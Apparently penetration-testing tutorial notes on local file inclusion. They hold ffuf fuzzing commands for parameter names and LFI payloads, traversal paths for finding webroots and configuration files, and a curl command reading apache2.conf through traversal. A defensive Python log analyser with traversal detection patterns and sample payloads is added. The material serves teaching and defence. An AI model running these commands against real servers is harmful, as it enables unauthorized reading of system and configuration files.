Automated Scanning

Web applications often accept parameters that are not referenced by any HTML form. Because such parameters are rarely tested, they are more likely to be vulnerable, and fuzzing for them can reveal an LFI entry point. The ffuf tool can be used to fuzz GET parameter names effectively.

Example of Fuzzing GET Parameters

ffuf -w /opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287

This command scans for exposed parameter names, filtering out responses of the default size (here 2287 bytes). Each parameter it finds can then be tested for LFI.

📜 LFI Wordlists

Manual crafting of LFI payloads is reliable, but quick tests using common LFI payloads can save time. A recommended wordlist is LFI-Jhaddix.txt, which contains various bypasses and common files.

Example of Fuzzing with LFI Wordlist

ffuf -w /opt/useful/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287

This command tests the language parameter for common LFI payloads.

🗂️ Fuzzing Server Files

Identifying server files can aid in LFI exploitation. The key items are the server's webroot path, its configuration files, and its logs.

Finding the Server Webroot

To locate the server webroot path, fuzz for the index.php file using common webroot paths.

Example of Fuzzing for Webroot Path

ffuf -w /opt/useful/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287

This command helps identify the correct webroot path.

📁 Server Logs/Configurations

Identifying logs and configuration files is essential for further exploitation. The LFI-Jhaddix.txt wordlist can be used to find these paths.

Example of Fuzzing for Server Configurations

ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287

This command scans for server configuration files, which may contain valuable information.

Reading Configuration Files

To read a specific configuration file, use curl:

curl http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/apache2.conf

This retrieves the Apache configuration, revealing the webroot and log paths.
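As an added, defender-side example that is not part of the original notes, the Python script below parses constructed Apache access-log lines and flags the two footprints the ffuf and curl commands above leave on a server: traversal sequences in a query parameter such as language, and one client guessing many distinct parameter names against a single script. The log lines, IP addresses and the three-name threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format log lines (not real server data) modelling the
# traffic the ffuf and curl commands above produce: one client guessing parameter
# names against index.php, then sending traversal payloads in "language".
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=value HTTP/1.1" 200 2287 "-" "-"
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=value HTTP/1.1" 200 2287 "-" "-"
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?language=value HTTP/1.1" 200 2287 "-" "-"
10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?language=../../../../etc/apache2/apache2.conf HTTP/1.1" 200 7224 "-" "curl/8.0"
10.0.0.5 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?language=..%2f..%2f..%2fetc/passwd HTTP/1.1" 200 3120 "-" "curl/8.0"
192.168.1.20 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?language=es HTTP/1.1" 200 2287 "-" "Mozilla/5.0"
"""

# Client IP, request target, status and response size from a combined-format line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) (?P<size>\d+|-)')
# Traversal in either slash style, plus the config/log locations the wordlists above
# aim at; matched after URL decoding so encoded slashes do not slip through.
TRAVERSAL_RE = re.compile(r'\.\./|\.\.\\|/etc/|/var/log/', re.IGNORECASE)


def analyze(log_text, fuzz_threshold=3):
    """Return (traversal_hits, fuzzing_ips): a list of (ip, parameter, decoded value)
    for traversal-like values, and the IPs that used >= fuzz_threshold distinct
    parameter names on one path (the footprint of parameter-name fuzzing)."""
    traversal_hits = []
    names_seen = defaultdict(set)  # (ip, path) -> parameter names used
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        ip, target = m.group("ip"), m.group("target")
        parts = urlsplit(target)
        params = parse_qsl(parts.query, keep_blank_values=True)
        names_seen[(ip, parts.path)].update(name for name, _ in params)
        for name, value in params:
            decoded = unquote(value)  # parse_qsl decoded once; catch double encoding
            if TRAVERSAL_RE.search(decoded):
                traversal_hits.append((ip, name, decoded))
    fuzzing_ips = {ip for (ip, _), names in names_seen.items()
                   if len(names) >= fuzz_threshold}
    return traversal_hits, fuzzing_ips


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```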


🛠️ LFI Tools

Several tools can automate the LFI exploitation process, such as LFISuite, LFiFreak, and liffy. While these tools can save time, they may miss vulnerabilities that manual testing would catch. Most tools are outdated and rely on Python 2, so their long-term viability is questionable.

Conclusion

Utilizing both manual techniques and automated tools can enhance the effectiveness of identifying and exploiting LFI vulnerabilities. Always verify findings through manual testing to ensure accuracy.